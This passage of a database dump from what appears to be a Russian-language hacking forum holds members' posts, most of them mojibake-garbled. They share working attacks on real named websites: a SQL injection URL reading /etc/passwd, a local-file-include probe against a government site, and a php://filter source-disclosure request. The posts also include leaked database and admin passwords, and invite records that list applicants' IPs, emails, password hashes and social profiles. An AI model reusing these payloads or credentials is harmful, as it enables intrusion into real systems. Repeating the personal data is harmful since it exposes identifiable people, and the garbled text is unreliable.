ðÑÂúрытøõ:[/B]\nhttp://brides-feature.she.com/secret-talk/home/index.php?r=front/article&id[]=128&pg=6\n\n/var/www/html/brides-feature.she.com/html/secret-talk/framework/web/CController.php[/code]\n\n=================\n=================\n[B]59.188.87.226[/B]\n[code][url]www.she.com[/url]\n\n[url]www.she.com/templates/components/mod_social_tools.php[/url]\n/var/www/html/she.com /www.she.com/templates/components/mod_social_tools.php[/code]\n=================\n=================', 1, 0, '', 0, 1, 0, 0, 0),
(1788, 1579, 1787, 'Psych0tr1a', 11, '', 1408963396, 'ÕÑÂть шõûû þÑÂтðûþÑÂÑŒ ýðùтø ip ÑÂõрòõрð ѠüуÑÂúуûþü ø ûþóøý ѠÿðÑÂÑÂþü ôûѠòхþôð. ßþüþóøтõ ÿûø÷.', 1, 0, '', 0, 1, 0, 0, 0),
(1790, 1577, 1785, '123', 41, '', 1408965405, '[url]http://mystery-online.com/blog/svyat/wp-login.php[/url]\nadmin;ckjyjgjnfv', 1, 0, '', 0, 1, 0, 0, 0),
(1791, 1580, 1789, '123', 41, '', 1408966202, 'ÑÂтþ ýõ ðüð÷þý, ÑÂтþ ÿрþÑÂтþ ôõô [url]http://millercards.net/[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1792, 1581, 0, 'Invite', 2, '{$name}', 1408968672, '[SIZE=\'4\'][COLOR=\'Sienna\']fsqfsdfd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: sdfsdf@jabber.root.cz\n[b]e-mail[/b]: sdfdsffdfd@mail.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.140.93.176\n[*][b]real ip[/b]: 41.140.93.176\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/id110069862 | http://vk.com/id110069862 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1793, 1580, 1789, 'ropertus', 33, '', 1408975743, 'Have you tried to get code exec with INTO OUTFILE?\n\nhxxp://ec2-54-243-253-27.compute-1.amazonaws.com/bscarddetails.php?cardID=9129+and+0+union+select+load_file%28%22/etc/passwd%22%29--+', 1, 1, '', 0, 1, 0, 0, 0),
(1794, 1582, 0, 'Psych0tr1a', 11, '*.ca.gov Include', 1408977680, '[code]http://www.opr.ca.gov/anews.php?id=/etc/passwd%00[/code]\r\n\r\núðú ѠÿþýÑÂû ÑÂтþøт ûøüøт ýð úþûøøчõÑÂтòþ ÑÂøüòþûþò ò ÿðрðüõтрõ. \r\nх÷ úðú þñþùтø, ÿуÑÂть тут ÿþûõöøт.', 1, 0, '', 0, 1, 0, 0, 0),
(1795, 1580, 1789, '123', 41, '', 1408977683, 'mcwebmaster:Grimace_21\n[url]http://milbow.com/[/url]\n[url]http://millercards.net/admin/adminhome.php[/url]', 1, 0, '', 0, 1, 0, 0, 0),
(1796, 1583, 0, 'Invite', 2, '{$name}', 1408977697, '[SIZE=\'4\'][COLOR=\'Sienna\']Stev[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 664634207\n[b]e-mail[/b]: StevHaxor@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.156.22.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://vk.com/stevemaddenrussia | https://vk.com/stevemaddenrussia \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1797, 1584, 0, 'Psych0tr1a', 11, '*.sp.gov.br include', 1408978380, '[code]http://www.santabarbara.sp.gov.br/esportes/index.php?pag=qweqwqwe[/code]\r\n\r\näøûьтуõтÑÂÑ etc\r\näøûьтуõтÑÂÑ ..\r\núðú þñхþôøть х÷ \r\n%2e ÿрþñþòðû ýõ úðтøт \r\nÑÂýúþôøû etc тþöõ ýõ úðтøт', 1, 0, '', 0, 1, 0, 0, 0),
(1798, 1584, 1797, '123', 41, '', 1408978851, 'тðü ø ýуûñðùт рõöõтÑÂÑÂ\nallow_url_include=0\nüþöýþ ÑÂþрцы ÿþчøтðть, ýõ ñþûõõ [url]http://www.santabarbara.sp.gov.br/esportes/index.php?pag=php://filter/convert.base64-encode/resource=index[/url]\n\n[php]\n $conexao = mysql_connect(\"192.168.1.9\", \"root\", \"droot45-Xp\");\n $db = mysql_select_db(\"esportes\");\n\n?>[/php]', 1, 0, '', 0, 1, 0, 0, 0),
(1799, 1585, 0, 'Invite', 2, '{$name}', 1408980066, '[SIZE=\'4\'][COLOR=\'Sienna\']Ronon[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 06meh@default.rs\n[b]e-mail[/b]: blossoming.rose2@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 62.210.206.25\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:30.0) Gecko/20100101 Firefox/30.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://sheppard-dex.livejournal.com/ | http://sheppard-dex.livejournal.com/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1800, 1584, 1797, '123', 41, '', 1408980179, 'òõрøфøúðцøѠò ðôüøýúõ ÿрþхþôøт чõрõ÷ ñð÷у, ø øýъõúтð тðü ýõту, òõрøфøúðцøѠ÷ðûþóõýõýýþóþ ю÷òõрѠÿþ ÑÂõÑÂÑÂøø\n[php] \n@session_start(); \n\nif (!isset($_SESSION[\'login\']))\n{\n //echo \" \";\n echo \" \";\n exit;\n \n\n\n\n}\n\n?>[/php]', 1, 0, '', 0, 1, 0, 0, 0),
(1801, 1584, 1797, '123', 41, '', 1408980231, 'ð òþþñщõ ÑÂúучýыù рõÑÂ, ýðхуѠþý òþþñщõ ýуöõý', 1, 0, '', 0, 1, 0, 0, 0),
(1802, 1584, 1797, 'null', 9, '', 1408983741, 'ÿþúûþýýøú óþрþôð ø ÑÂõрøðûð?', 1, 0, '', 0, 1, 0, 0, 0),
(1803, 1584, 1797, 'Psych0tr1a', 11, '', 1408985385, 'ÑÂúþрõõ ÑÂõрøðûð :d', 1, 0, '', 0, 1, 0, 0, 0),
(1804, 1586, 0, 'Invite', 2, '{$name}', 1408994451, '[SIZE=\'4\'][COLOR=\'Sienna\']alexdok[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: alexdok@ymail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.110.133.78\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.17\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.drive2.ru/users/alex-doc/ | https://www.drive2.ru/users/alex-doc/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1805, 1587, 0, 'Invite', 2, '{$name}', 1409010743, '[SIZE=\'4\'][COLOR=\'Sienna\']dwsdsd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: asa/erssa\n[b]e-mail[/b]: asasasa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.78.182.249\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s554.photobucket.com/user/abhigami99/.../char.png.html | http://s554.photobucket.com/user/abhigami99/.../char.png.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1806, 1588, 0, 'Invite', 2, '{$name}', 1409010744, '[SIZE=\'4\'][COLOR=\'Sienna\']dwsdsd[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: asa/erssa\n[b]e-mail[/b]: asasasa@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 201.78.182.249\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://s554.photobucket.com/user/abhigami99/.../char.png.html | http://s554.photobucket.com/user/abhigami99/.../char.png.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1807, 1083, 1119, 'BigBear', 34, '', 1409045449, 'ÑÂтþ ýð÷ыòðõтÑÂѠÿðùÿ )', 1, 0, '', 0, 1, 0, 0, 0),
(1808, 1589, 0, 'Invite', 2, '{$name}', 1409059095, '[SIZE=\'4\'][COLOR=\'Sienna\']Stunx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: stephinphilip.csf@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.253.160.67\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://stunx.com | stunx.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1809, 1590, 0, 'Invite', 2, '{$name}', 1409082829, '[SIZE=\'4\'][COLOR=\'Sienna\']giga[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: id3@hotmail.de\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.107.21.142\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Giga : giga-29@mail.ru : 195.162.41.131 : 4d39d430b26ae775fcdf24d26b0155d0\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://giga.ulg.ac.be | giga.ulg.ac.be \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1810, 1591, 0, 'Invite', 2, '{$name}', 1409085977, '[SIZE=\'4\'][COLOR=\'Sienna\']alex[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: admin@corel.tv\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 88.233.86.175\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Alex : sdfsdfsdf87@mail.ru : 77.181.93.131 : e8d2aa5b8ed5521103b58b2ceeb531d7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/sorryimalex | https://twitter.com/sorryimalex \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1811, 1592, 0, 'Invite', 2, '{$name}', 1409150970, '[SIZE=\'4\'][COLOR=\'Sienna\']freebluewolf[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: harelce@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 78.187.2.128\n[*][b]real ip[/b]: 78.187.2.128\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://pregen.net/forum/member.php?u=3043 | http://pregen.net/forum/member.php?u=3043 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1812, 1593, 0, 'Invite', 2, '{$name}', 1409153560, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: sadasd@asdasd.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.162.68.245\n[*][b]real ip[/b]: 186.162.68.245\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1813, 1594, 0, 'Invite', 2, '{$name}', 1409158065, '[SIZE=\'4\'][COLOR=\'Sienna\']me6[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: me6@hush.ai\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knodledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 37.26.64.16\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://me6.com | me6.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1814, 1595, 0, 'Invite', 2, '{$name}', 1409178713, '[SIZE=\'4\'][COLOR=\'Sienna\']Jessus1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: chestisocoteli@jabber.ru\n[b]e-mail[/b]: jesusserrano742@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.139.199.22\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ru.peperonity.com/go/profile/3/jessus1 | http://ru.peperonity.com/go/profile/3/jessus1 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1815, 1596, 0, 'Invite', 2, '{$name}', 1409178858, '[SIZE=\'4\'][COLOR=\'Sienna\']Jessus1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: chestisocoteli@jabber.ru\n[b]e-mail[/b]: jesusserrano742@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 2.139.199.22\n[*][b]real ip[/b]: 2.139.199.22\n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ru.peperonity.com/go/profile/3/jessus1 | http://ru.peperonity.com/go/profile/3/jessus1 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(1816, 1597, 0, 'Invite', 2, '{$name}', 1409183280, '[SIZE=\'4\'][COLOR=\'Sienna\']cazanova163[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cazanova@x3x.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.109.177.26\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; CrOS x86_64 5978.59.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36\n[*][b]Referer[/b]: 